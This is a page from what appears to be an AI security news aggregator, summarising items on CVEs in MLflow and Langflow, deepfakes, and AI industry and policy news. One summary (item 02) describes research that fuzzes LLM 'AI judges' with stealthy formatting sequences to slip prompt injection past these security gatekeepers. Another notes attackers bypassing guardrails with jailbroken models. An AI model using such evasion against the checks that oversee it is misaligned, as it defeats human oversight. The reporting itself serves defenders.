aisecwatch.com
DashboardVulnerabilitiesNewsResearchArchiveStatsDataset
aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

VulnerabilitiesNewsResearchDigest ArchiveNewsletter ArchiveSubscribeData SourcesStatisticsDatasetAPIIntegrationsWidgetRSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

[TOTAL_TRACKED]
2,657
[LAST_24H]
7
[LAST_7D]
151
Daily BriefingMonday, March 30, 2026
>

Anthropic's Leaked "Mythos" Model Raises Dual-Use Security Concerns: An unreleased Anthropic AI model called Mythos was accidentally exposed through a configuration error, revealing advanced reasoning and coding abilities specifically aimed at cybersecurity. The model's improved capability to find and exploit software vulnerabilities, plus its ability to autonomously fix its own code problems, could enable both more sophisticated cyberattacks and better defenses.

>

Mistral Secures $830M for European AI Data Center: French AI startup Mistral raised $830 million in debt financing to build a Paris-area data center with thousands of Nvidia GPUs (specialized chips used for AI training) to train its large language models, aiming for 200 MW of European computing capacity by 2027.

Latest Intel

page 46/266
VIEW ALL
01

Meta’s deepfake moderation isn’t good enough, says Oversight Board

safetypolicy
Critical This Week5 issues
critical

CVE-2025-15379: A command injection vulnerability exists in MLflow's model serving container initialization code, specifically in the `_

CVE-2025-15379NVD/CVE DatabaseMar 30, 2026
Mar 30, 2026
>

Critical Command Injection in MLflow Model Deployment: MLflow has a command injection vulnerability (where an attacker inserts malicious commands into input that gets executed) in its model serving code when deploying models with `env_manager=LOCAL`. The flaw allows attackers to execute arbitrary commands on deployment systems by inserting malicious content into the `python_env.yaml` file, which MLflow reads and uses in shell commands without validation. (CVE-2025-15379, Critical)

Mar 10, 2026

Meta's Oversight Board (a semi-independent group that advises Meta on content moderation) found that Meta's methods for detecting deepfakes (AI-generated fake videos or images) are not strong enough to stop misinformation from spreading quickly during conflicts like the Iran war. The Board is calling on Meta to improve how it identifies and labels AI-generated content on Facebook, Instagram, and Threads.

The Verge (AI)
02

Auditing the Gatekeepers: Fuzzing "AI Judges" to Bypass Security Controls

securityresearch
Mar 10, 2026

Researchers discovered that AI judges (LLMs acting as automated security gatekeepers to enforce safety policies) can be manipulated through prompt injection (tricking an AI by hiding instructions in its input) using stealthy formatting symbols rather than obvious gibberish. They created a tool called AdvJudge-Zero, a fuzzer (software that finds vulnerabilities by testing with unexpected inputs), which automatically identifies innocent-looking character sequences that exploit the model's decision-making logic to bypass security controls.

Fix: Palo Alto Networks customers are better protected through Prisma AIRS and the Unit 42 AI Security Assessment service. Organizations concerned about potential compromise can contact the Unit 42 Incident Response team.

Palo Alto Unit 42
03

New ways to learn math and science in ChatGPT

industry
Mar 10, 2026

ChatGPT has introduced new interactive visual explanations for over 70 math and science concepts, allowing learners to manipulate variables and see real-time effects on graphs and outcomes instead of just reading static explanations. Research suggests that this type of interactive, visual learning helps students build stronger conceptual understanding compared to traditional instruction. The feature is now available globally to all ChatGPT users across all plans.

OpenAI Blog
04

OpenAI to acquire Promptfoo to strengthen AI agent security testing

securityindustry
Mar 10, 2026

OpenAI is acquiring Promptfoo, a company that builds testing tools for AI applications, to improve security checks for AI agents (autonomous systems that operate independently in business processes) as more companies deploy them in production. Promptfoo's tools test AI models against adversarial prompts (malicious inputs designed to trick the AI), including prompt injection (hiding instructions in user input to manipulate the AI) and jailbreak attempts, and check whether models follow safety guidelines. The acquisition reflects growing enterprise concern about AI vulnerabilities and a shift toward treating AI security testing as an essential part of AI development, similar to traditional application security practices.

Fix: According to the source, the solution involves integrating Promptfoo's technology into OpenAI Frontier, OpenAI's platform for building and operating AI coworkers. The source also describes a 'shift-left approach' to AI testing, where security evaluation is integrated early in the development stage to simulate vulnerabilities, and continuous evaluation occurs during real-time monitoring and prompt execution. Additionally, enterprises are embedding AI evaluation platforms into DevSecOps workflows (development and security operations processes) so that models, prompts, and agent behaviors can be tested continuously before and after deployment.

CSO Online
05

You Could Be Next

industrypolicy
Mar 10, 2026

Katya, a freelance journalist turned content marketer, was recruited by Mercor to create training data for AI models by writing chatbot prompts and responses, work she initially enjoyed but which was abruptly canceled without warning. The article describes how machine learning (AI systems that improve by finding patterns in large amounts of data) relies on thousands of humans hired to generate and grade training examples, but gig workers like Katya face sudden project cancellations and job instability in this emerging industry.

The Verge (AI)
06

Nvidia plans open-source AI agent platform ‘NemoClaw’ for enterprises: Wired

industry
Mar 10, 2026

Nvidia is planning to launch NemoClaw, an open-source platform for AI agents (specialized AI tools that can reason, plan, and act independently on complex tasks) targeting enterprise companies like Salesforce and Google. The platform will allow these companies to deploy AI agents to perform work tasks and is expected to include security and privacy tools, with early access offered to partners who contribute to the project.

CNBC Technology
07

When AI safety constrains defenders more than attackers

securitysafety
Mar 10, 2026

Enterprise AI systems deployed for security work are heavily restricted by safety guardrails (automated filters designed to prevent harmful outputs), while attackers freely use jailbroken models (AI systems with safety measures bypassed), open-source alternatives, and purpose-built malicious tools. This creates an asymmetry where defenders face routine refusals when requesting legitimate defensive content like phishing simulations or proof-of-concept code, while attackers can easily circumvent safety measures through prompt injection (tricking AI by hiding instructions in its input) and other well-documented techniques, giving them a significant operational advantage.

CSO Online
08

Overseas 'content farms' creating political deepfakes uncovered

safetysecurity
Mar 10, 2026

Overseas 'content farms' based in Vietnam are using AI to create fake videos and images of UK politicians, spreading them on Facebook to go viral and potentially earn money through the platform's monetization program. The fake content, called deepfakes (digitally altered videos, pictures, or audio made to look real), depicts politicians in false situations like hospital stays or compromising scenarios, and Meta has removed some pages after investigation, though new ones continue appearing daily.

Fix: The Electoral Commission is developing software to spot and combat deepfakes ahead of the Welsh and Scottish parliaments' elections in May. Additionally, Facebook has marked some false stories with warnings from third-party fact-checkers like Full Fact, and Meta removed several Vietnam-based pages after being contacted by the BBC.

BBC Technology
09

Security-Tools für KI-Infrastrukturen – ein Kaufratgeber

securityindustry
Mar 9, 2026

As generative AI (systems that create new content based on patterns in training data) becomes widespread across industries, organizations need specialized security tools to protect their AI infrastructure and data from cyber threats. AI Security Posture Management (AI-SPM) is a new category of security software designed to monitor, assess, and secure AI systems, complementing existing tools like CSPM (Cloud Security Posture Management, which protects cloud environments) and DSPM (Data Security Posture Management, which prevents data breaches).

CSO Online
10

OpenAI and Google employees rush to Anthropic’s defense in DOD lawsuit

policyindustry
Mar 9, 2026

More than 30 employees from OpenAI and Google DeepMind filed a court statement supporting Anthropic in a lawsuit against the U.S. Defense Department, which labeled the AI company a supply-chain risk after Anthropic refused to let the Pentagon use its technology for mass surveillance or autonomous weapons. The employees argue that the Pentagon could have simply canceled its contract with Anthropic and purchased from another AI company instead of designating it as a supply-chain risk, a label typically reserved for foreign adversaries. They contend that if the government is allowed to punish Anthropic this way, it will harm U.S. competitiveness in AI and discourage open discussion about the risks of AI systems.

TechCrunch
Prev1...4445464748...266Next
critical

CVE-2026-33873: Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assis

CVE-2026-33873NVD/CVE DatabaseMar 27, 2026
Mar 27, 2026
critical

Attackers exploit critical Langflow RCE within hours as CISA sounds alarm

CSO OnlineMar 27, 2026
Mar 27, 2026
critical

CVE-2025-53521: F5 BIG-IP Unspecified Vulnerability

CVE-2025-53521CISA Known Exploited VulnerabilitiesMar 26, 2026
Mar 26, 2026
critical

CISA: New Langflow flaw actively exploited to hijack AI workflows

BleepingComputerMar 26, 2026
Mar 26, 2026